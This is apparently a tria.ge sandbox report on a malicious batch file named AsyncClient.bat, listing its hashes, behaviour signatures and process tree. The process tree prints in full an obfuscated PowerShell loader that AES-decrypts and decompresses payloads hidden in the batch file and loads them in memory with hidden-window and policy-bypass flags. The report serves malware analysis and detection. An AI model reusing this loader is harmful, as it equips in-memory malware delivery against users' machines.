Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
48s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07/05/2024, 00:10
Static task
static1
Behavioral task
behavioral1
Sample
AsyncClient.bat
Resource
win7-20240221-en
5 signatures
150 seconds
General
-
Target
AsyncClient.bat
-
Size
63KB
-
MD5
dbce32c8a127cd9a7966fe4a47071071
-
SHA1
f1866b877b463be6df04dace8bccec70e11ce311
-
SHA256
79d51a6e1d88225fbdf916f4f608ce53e563440df0b23d5f3ccc3aba1f12d7d5
-
SHA512
e2165665aa1000a133734a760d78e341053ad0dbd5e904d4a58675167839b758423df8b71e206b1648fc44cb48ecd1c97a853cfac5f4b7b3d443d048d77266c6
-
SSDEEP
1536:rUqEZ9FzJrPZjPIUNcjvJsS/akFhJYCFyCteszYN:rEjPDTWakjpA0+
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2952 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2952 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2952 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2944 wrote to memory of 2952 2944 cmd.exe 29 PID 2944 wrote to memory of 2952 2944 cmd.exe 29 PID 2944 wrote to memory of 2952 2944 cmd.exe 29 PID 2944 wrote to memory of 2952 2944 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\AsyncClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7vVvuBLNEY/Ww8Yz8DqinX8Dj8QIWa7OX8xGc0CKzoU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbfc0SmDvLsWPG+T0C1fCA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $kxWEZ=New-Object System.IO.MemoryStream(,$param_var); $tVgbr=New-Object System.IO.MemoryStream; $RDVEt=New-Object System.IO.Compression.GZipStream($kxWEZ, [IO.Compression.CompressionMode]::Decompress); $RDVEt.CopyTo($tVgbr); $RDVEt.Dispose(); $kxWEZ.Dispose(); $tVgbr.Dispose(); $tVgbr.ToArray();}function execute_function($param_var,$param2_var){ $OGwTS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OLupP=$OGwTS.EntryPoint; $OLupP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\AsyncClient.bat';$UNWbP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\AsyncClient.bat').Split([Environment]::NewLine);foreach ($XLLii in $UNWbP) { if ($XLLii.StartsWith(':: ')) { $FSGvM=$XLLii.Substring(3); break; }}$payloads_var=[string[]]$FSGvM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952
-